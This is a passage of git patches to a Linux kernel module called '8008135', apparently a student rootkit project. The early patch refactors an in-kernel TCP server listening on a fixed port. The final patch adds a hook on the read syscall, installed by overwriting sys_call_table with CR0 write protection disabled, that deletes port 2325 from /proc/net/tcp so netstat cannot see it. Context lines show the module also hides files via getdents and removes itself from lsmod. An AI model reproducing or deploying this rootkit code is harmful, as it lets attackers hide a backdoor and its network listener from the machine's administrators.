pr_info("connection handler: %d of: %s %d exiting normally\n", - id, tmp, ntohs(address->sin_port)); - kfree(tmp); - */ - tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; - kfree(tcp_conn_handler->data[id]->address); - kfree(tcp_conn_handler->data[id]); - sock_release(tcp_conn_handler->data[id]->accept_socket); - //spin_lock(&tcp_server_lock); - tcp_conn_handler->thread[id] = NULL; - //spin_unlock(&tcp_server_lock); - //return 0; + STCPConnHandler->tcp_conn_handler_stopped[LID]= 1; + kfree(STCPConnHandler->data[LID]->FAddress); + kfree(STCPConnHandler->data[LID]); + sock_release(STCPConnHandler->data[LID]->FAcceptSocket); + STCPConnHandler->thread[LID] = NULL; do_exit(0); } int tcp_server_accept(void){ - int accept_err = 0; - struct socket *socket; - struct socket *accept_socket = NULL; - struct inet_connection_sock *isock; - int id = 0; + int LAcceptErr = 0; + struct socket *LSocket; + struct socket *LAcceptSocket = NULL; + struct inet_connection_sock *LISock; + int LID = 0; DECLARE_WAITQUEUE(accept_wait, current); allow_signal(SIGKILL|SIGSTOP); - socket = tcp_server->listen_socket; + LSocket = FTCPServer_Service->FListenSocket; pr_info(" *** mtp | creating the accept socket | tcp_server_accept " "*** \n"); while(1){ - struct tcp_conn_handler_data *data = NULL; - struct sockaddr_in *client = NULL; - char *tmp; + struct tcp_conn_handler_data *LTCPConnHData = NULL; + struct sockaddr_in *LClient = NULL; + char *LTmp; int addr_len; - accept_err = - sock_create(socket->sk->sk_family, socket->type,\ - socket->sk->sk_protocol, &accept_socket); + LAcceptErr = + sock_create(LSocket->sk->sk_family, LSocket->type,\ + LSocket->sk->sk_protocol, &LAcceptSocket); - if(accept_err < 0 || !accept_socket){ + if(LAcceptErr < 0 || !LAcceptSocket){ pr_info(" *** mtp | accept_error: %d while creating " "tcp server accept socket | " - "tcp_server_accept *** \n", accept_err); + "tcp_server_accept *** \n", LAcceptErr); goto err; } - accept_socket->type = socket->type; - accept_socket->ops = socket->ops; + LAcceptSocket->type = LSocket->type; + LAcceptSocket->ops = LSocket->ops; - isock = inet_csk(socket->sk); + LISock = inet_csk(LSocket->sk); - add_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); - while(reqsk_queue_empty(&isock->icsk_accept_queue)){ + add_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); + while(reqsk_queue_empty(&LISock->icsk_accept_queue)){ __set_current_state(TASK_INTERRUPTIBLE); schedule_timeout(HZ); if(kthread_should_stop()){ pr_info(" *** mtp | tcp server acceptor thread " "stopped | tcp_server_accept *** \n"); - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; __set_current_state(TASK_RUNNING); - remove_wait_queue(&socket->sk->sk_wq->wait,\ + remove_wait_queue(&LSocket->sk->sk_wq->wait,\ &accept_wait); - sock_release(accept_socket); + sock_release(LAcceptSocket); return 0; } if(signal_pending(current)){ __set_current_state(TASK_RUNNING); - remove_wait_queue(&socket->sk->sk_wq->wait,\ + remove_wait_queue(&LSocket->sk->sk_wq->wait,\ &accept_wait); goto release; } } __set_current_state(TASK_RUNNING); - remove_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); + remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); pr_info("accept connection\n"); - accept_err = - socket->ops->accept(socket, accept_socket, O_NONBLOCK); + LAcceptErr = + LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); - if(accept_err < 0){ + if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d while accepting " "tcp server | tcp_server_accept *** \n", - accept_err); + LAcceptErr); goto release; } - client = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL); - memset(client, 0, sizeof(struct sockaddr_in)); + LClient = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL); + memset(LClient, 0, sizeof(struct sockaddr_in)); addr_len = sizeof(struct sockaddr_in); - accept_err = - accept_socket->ops->getname(accept_socket,\ - (struct sockaddr *)client,\ + LAcceptErr = + LAcceptSocket->ops->getname(LAcceptSocket,\ + (struct sockaddr *)LClient,\ &addr_len, 2); - if(accept_err < 0){ + if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d in getname " "tcp server | tcp_server_accept *** \n", - accept_err); + LAcceptErr); goto release; } - tmp = inet_ntoa(&(client->sin_addr)); + LTmp = inet_ntoa(&(LClient->sin_addr)); pr_info("connection from: %s %d \n", - tmp, ntohs(client->sin_port)); + LTmp, ntohs(LClient->sin_port)); - kfree(tmp); + kfree(LTmp); pr_info("handle connection\n"); - for(id = 0; id < MAX_CONNS; id++){ - if(tcp_conn_handler->thread[id] == NULL) + for(LID = 0; LID < MAX_CONNS; LID++){ + if(STCPConnHandler->thread[LID] == NULL) break; } - pr_info("gave free id: %d\n", id); + pr_info("gave free id: %d\n", LID); - if(id == MAX_CONNS) + if(LID == MAX_CONNS) goto release; - data = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL); - memset(data, 0, sizeof(struct tcp_conn_handler_data)); + LTCPConnHData = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL); + memset(LTCPConnHData, 0, sizeof(struct tcp_conn_handler_data)); - data->address = client; - data->accept_socket = accept_socket; - data->thread_id = id; + LTCPConnHData->FAddress = LClient; + LTCPConnHData->FAcceptSocket = LAcceptSocket; + LTCPConnHData->FThreadID = LID; - tcp_conn_handler->tcp_conn_handler_stopped[id] = 0; - tcp_conn_handler->data[id] = data; - tcp_conn_handler->thread[id] = - kthread_run((void *)connection_handler, (void *)data, MODULE_NAME); + STCPConnHandler->tcp_conn_handler_stopped[LID] = 0; + STCPConnHandler->data[LID] = LTCPConnHData; + STCPConnHandler->thread[LID] = + kthread_run((void *)connection_handler, (void *)LTCPConnHData, MODULE_NAME); if(kthread_should_stop()){ pr_info(" *** mtp | tcp server acceptor thread stopped" " | tcp_server_accept *** \n"); - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; return 0; } @@ -399,60 +385,60 @@ int tcp_server_accept(void){ } - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; do_exit(0); release: - sock_release(accept_socket); + sock_release(LAcceptSocket); err: - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; do_exit(0); } int tcp_server_listen(void) { - int server_err; - struct socket *conn_socket; - struct sockaddr_in server; + int LServerErr; + struct socket *LConnSocket; + struct sockaddr_in LServer; DECLARE_WAIT_QUEUE_HEAD(wq); allow_signal(SIGKILL|SIGTERM); - server_err = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\ - &tcp_server->listen_socket); - if(server_err < 0){ + LServerErr = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\ + &FTCPServer_Service->FListenSocket); + if(LServerErr < 0){ pr_info(" *** mtp | Error: %d while creating tcp server " - "listen socket | tcp_server_listen *** \n", server_err); + "listen socket | tcp_server_listen *** \n", LServerErr); goto err; } - conn_socket = tcp_server->listen_socket; - tcp_server->listen_socket->sk->sk_reuse = 1; + LConnSocket = FTCPServer_Service->FListenSocket; + FTCPServer_Service->FListenSocket->sk->sk_reuse = 1; - server.sin_addr.s_addr = INADDR_ANY; - server.sin_family = AF_INET; - server.sin_port = htons(DEFAULT_PORT); + LServer.sin_addr.s_addr = INADDR_ANY; + LServer.sin_family = AF_INET; + LServer.sin_port = htons(DEFAULT_PORT); - server_err = - conn_socket->ops->bind(conn_socket, (struct sockaddr*)&server,\ - sizeof(server)); + LServerErr = + LConnSocket->ops->bind(LConnSocket, (struct sockaddr*)&LServer,\ + sizeof(LServer)); - if(server_err < 0){ + if(LServerErr < 0){ pr_info(" *** mtp | Error: %d while binding tcp server " - "listen socket | tcp_server_listen *** \n", server_err); + "listen socket | tcp_server_listen *** \n", LServerErr); goto release; } - server_err = conn_socket->ops->listen(conn_socket, 16); + LServerErr = LConnSocket->ops->listen(LConnSocket, 16); - if(server_err < 0){ + if(LServerErr < 0){ pr_info(" *** mtp | Error: %d while listening in tcp " "server listen socket | tcp_server_listen " - "*** \n", server_err); + "*** \n", LServerErr); goto release; } - tcp_server->accept_thread = + FTCPServer_Service->FAccpeptThread = kthread_run((void*)tcp_server_accept, NULL, MODULE_NAME); while(1){ @@ -469,19 +455,19 @@ int tcp_server_listen(void) } - sock_release(conn_socket); - tcp_listener_stopped = 1; + sock_release(LConnSocket); + STCPListenerStopped = 1; do_exit(0); release: - sock_release(conn_socket); + sock_release(LConnSocket); err: - tcp_listener_stopped = 1; + STCPListenerStopped = 1; do_exit(0); } int tcp_server_start(void){ - tcp_server->running = 1; - tcp_server->thread = kthread_run((void *)tcp_server_listen, NULL,\ + FTCPServer_Service->FRunning = 1; + FTCPServer_Service->FThread = kthread_run((void *)tcp_server_listen, NULL,\ MODULE_NAME); return 0; } @@ -489,11 +475,11 @@ int tcp_server_start(void){ int network_server_init(void){ pr_info(" *** mtp | network_server initiated | " "network_server_init ***\n"); - tcp_server = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL); - memset(tcp_server, 0, sizeof(struct tcp_server_service)); + FTCPServer_Service = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL); + memset(FTCPServer_Service, 0, sizeof(struct tcp_server_service)); - tcp_conn_handler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL); - memset(tcp_conn_handler, 0, sizeof(struct tcp_conn_handler)); + STCPConnHandler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL); + memset(STCPConnHandler, 0, sizeof(struct tcp_conn_handler)); tcp_server_start(); return 0; @@ -503,20 +489,20 @@ void network_server_exit(void){ int ret; int id; - if(tcp_server->thread == NULL) + if(FTCPServer_Service->FThread == NULL) pr_info(" *** mtp | No kernel thread to kill | " "network_server_exit *** \n"); else { for(id = 0; id < MAX_CONNS; id++) { - if(tcp_conn_handler->thread[id] != NULL) + if(STCPConnHandler->thread[id] != NULL) { - if(!tcp_conn_handler->tcp_conn_handler_stopped[id]) + if(!STCPConnHandler->tcp_conn_handler_stopped[id]) { ret = - kthread_stop(tcp_conn_handler->thread[id]); + kthread_stop(STCPConnHandler->thread[id]); if(!ret) pr_info(" *** mtp | tcp server " @@ -527,32 +513,32 @@ void network_server_exit(void){ } } - if(!tcp_acceptor_stopped) + if(!STCPAcceptorStopped) { - ret = kthread_stop(tcp_server->accept_thread); + ret = kthread_stop(FTCPServer_Service->FAccpeptThread); if(!ret) pr_info(" *** mtp | tcp server acceptor thread" " stopped | network_server_exit *** \n"); } - if(!tcp_listener_stopped) + if(!STCPListenerStopped) { - ret = kthread_stop(tcp_server->thread); + ret = kthread_stop(FTCPServer_Service->FThread); if(!ret) pr_info(" *** mtp | tcp server listening thread" " stopped | network_server_exit *** \n"); } - if(tcp_server->listen_socket != NULL && !tcp_listener_stopped) + if(FTCPServer_Service->FListenSocket != NULL && !STCPListenerStopped) { - sock_release(tcp_server->listen_socket); - tcp_server->listen_socket = NULL; + sock_release(FTCPServer_Service->FListenSocket); + FTCPServer_Service->FListenSocket = NULL; } - kfree(tcp_conn_handler); - kfree(tcp_server); - tcp_server = NULL; + kfree(STCPConnHandler); + kfree(FTCPServer_Service); + FTCPServer_Service = NULL; } } From 14a0ea6b8f45b09766afd7374a2f9f0047c2fd3c Mon Sep 17 00:00:00 2001 From: Jan Koerner Date: Sun, 8 Dec 2019 00:31:43 +0100 Subject: [PATCH 5/5] hide open port from netstat --- src/8008135.c | 72 ++++++++++++++++++++++++++++++++++++++++++- src/headers/8008135.h | 14 +++++++-- 2 files changed, 83 insertions(+), 3 deletions(-) diff --git a/src/8008135.c b/src/8008135.c index b5460b6..2189d71 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -85,6 +85,72 @@ asmlinkage long sys_getdents_new(unsigned int fd, } +/*** FUNCTION **************************************************************** +* NAME: hide port +* DESCRIPTION: hides the port 2325 +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +read_ptr orig_read; +asmlinkage long hacked_read(unsigned int fd, char __user *buf, + size_t count) +{ + long result, bp, diff_in_bytes; + char *kbuf, *start_line, *end_line, *port_num; + char *pathname, pbuf[256]; + struct files_struct *current_files; + struct fdtable *files_table; + struct path file_path; + + // run real read + result = (*orig_read)(fd,buf,count); + if (result <= 0) + return result; + + // get pathname + // CITATION [8] from report + current_files = current->files; + files_table = files_fdtable(current_files); + + file_path = files_table->fd[fd]->f_path; + pathname = d_path(&file_path,pbuf,256*sizeof(char)); + // if virtual file /proc/net/tcp + if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { + // copy from user to kernelspace; + if (!access_ok(VERIFY_READ,buf,result)) + return -1; + if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + return -1; + if (copy_from_user(kbuf,buf,result)) + return -1; + + // filter out hidden ports + start_line = strchr(kbuf,':') - 4; // skip first line + diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; + port_num = strchr(strchr(start_line,':') + 1,':') + 1; + end_line = strchr(start_line,'\n'); + diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); + if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port + memmove(start_line,end_line + 1, // delete line in file + result - bp - diff_in_bytes); + result -= diff_in_bytes; + } + } + + // copy from kernel to userspace + if (!access_ok(VERIFY_WRITE,buf,result)) + return EINVAL; + if (copy_to_user(buf,kbuf,result)) + return EINVAL; + kfree(kbuf); + } + // return number of bytes read + return result; +} + + /*** FUNCTION **************************************************************** * NAME: hide_module * DESCRIPTION: hides the module from lsmod @@ -115,13 +181,16 @@ static int __init init_8008135(void) { // add our new handlers sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; + + orig_read = (read_ptr)sys_call_table[__NR_read]; + + sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; // turn write protect back on write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "New syscall in place\n"); network_server_init(); - hide_module(); printk(KERN_INFO "Module hidden"); @@ -140,6 +209,7 @@ static void __exit exit_8008135(void) { write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); // set getdents handler back sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; + sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; // turn write protect back on write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "Old syscall back\n"); diff --git a/src/headers/8008135.h b/src/headers/8008135.h index c81cdf3..0ff10ae 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -28,11 +28,20 @@ #include #include "5y563n.h" +#include +#include +#include +#include +#include +#include +#include +#include /**** Defines ***************************************************************** *******************************************************************************/ #define GETDENTS_SYSCALL_NUM 78 +#define READ_SYSCALL_NUM 0 #define WRITE_PROTECT_FLAG (1<<16) #define HIDE_PREFIX "8008135." @@ -40,6 +49,7 @@ #define MODULE_NAME "8008135" #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) +#define HIDE_PORT "0915" // 2325 in Hexadecimal /**** Modinfo **************************************************************** *******************************************************************************/ @@ -61,6 +71,6 @@ struct linux_dirent { typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count); - - +typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, + size_t count); #endif /* SRC_HEADERS_8008135_H */